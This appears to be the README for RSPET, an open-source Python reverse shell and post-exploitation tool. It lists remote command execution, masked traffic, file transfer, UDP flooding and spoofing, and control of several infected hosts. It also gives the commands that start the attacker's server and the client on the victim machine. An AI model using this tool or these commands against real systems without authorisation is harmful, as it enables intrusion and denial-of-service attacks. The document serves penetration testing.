RSPET (Reverse Shell and Post Exploitation Tool) is a Python based reverse shell equipped with functionalities that assist in a post exploitation scenario.
DISCLAIMER: This software is provided for educational and PenTesting purposes and as a proof of concept. The developer(s) do not endorse, incite or in any other way support unauthorised computer access and networks disruption.
NOTE: min folder has been removed. The added overhead of maintaining two versions lead to min not recieving bug-fixes and important updates. If there is interest, both in using and maintaining, a more bare-bone and simplistic version, a new branch will be created to host it.
Current Version: v0.2.7
Follow: @TheRSPET on Twitter for updates.
Documentation : rspet.readthedocs.io
- Remote Command Execution
- Trafic masking (XORed instead of cleartext); for better results use port 443[1]
- Built-in File/Binary transfer (both ways) over the masked traffic
- Built-in UDP Flooding tool
- Built-in UDP Spoofing tool[2]
- Multiple/All Hosts management; order File/Binary transfer and UDP Flood from Multiple/All connected Hosts
- Modular Code Design to allow easy customization
- Client script is tested and is compatible with PyInstaller (can be made into .exe)[3]
- Full server side plug-in support.[4]
- RESTful API for the Server Module.
*[1]The idea for XORing as well as the skeleton for the client came from primalsecurity.net so if you like this pack of scripts you'll probably love what they do
*[2]UDP Spoofing uses RAW_SOCKETS so in order to utilize it, the client has to run on an OS that supports RAW_SOCKETS (most Unix-Based) and with root privilages. Finally, most of the ISPs have implementations in place that will either drop or re-structure spoofed packets
*[3]Again check primalsecurity.net's perfect blogpost about producing an .exe
*[4]Detailed documentation on creating plugins available in Online Documentation!
rspet_server.pyis situated at the attacker's machine and running to accept connectionsrspet_client.pyis situated in the infected machine(s) and will initiate the connection and wait for input.
- Server:
python rspet_server.py (max_connections) max_connections defaults to 5 if left blank
-
RESTful API:
-
Install Flask with pip (only the first time)
pip2 install Flask
-
Start the API
python rspet_server_api.py
-
-
Client:
python rspet_client.py server_ipMany changes can be made to fit individual needs.
As always if you have any suggestion, bug report or complain feel free to contact me.
A list of Distros that contain RSPET
- BlackArch Linux (as of version 2016.04.28)
- ArchStrike
-
Fix logic bug where if a direct command to Host OS has no output Server displays command not recognized - Fix logic bug where if a direct command's to Host OS execution is perpetual the Server deadlocks
-
Add client version and type (min or full) as a property when client connects and atList_Hosts - Replace XORing with private key encryption (with random private key generated and traded upon connection)
- Must find a way that does not require any extra installation on the client
- Add a NoSQL (at least server-side) to store and handle traded keys
- Add public key encryption in order to:
- Encrypt the exchange of the private key
- Verify the "authenticity" of clients
- Add client update mechanism (initial thought was the use of execv but it acts up)
- Add a plugin system to client (a more compact one)
- Add remote installation of plugins to client
- Add installed plugins report from client to server
- Add UDP Reflection functionality
- Provide more settings via config file
- Re-introduce multythreading when handling multiple hosts.
- Make commands available with 'Tab' automatically generated based on loaded plugins.
-
Fix logical bug when deleting a client. (Client still shows up on List_Hosts) -
Create comprehensive plug-in creation guide.
This project is following Google's Python Styleguide with a minor variation on the use of whitespaces to align ":" tokens.
This project is open for contributors. If you have implemented a new feature, or maybe an improvement to the current code feel free to open a pull request. If you want to sugest a new feature open an issue. Additionally Testers are needed to run a few standard scenarios (and a few of their own maybe) to decrease the chance a bug slips into a new version. Should there be any interest about testing a beta branch will be created (where code to be tested will be uploaded) along with a list of scenarios. For a full guide on contribution opportunities and guides check out the "Contributing" chapter on RSPET's Online Documentation
dzervas -- Code (Server OO-redesign, Server Plug-in system implementation, bug reports, bug fixes)
MIT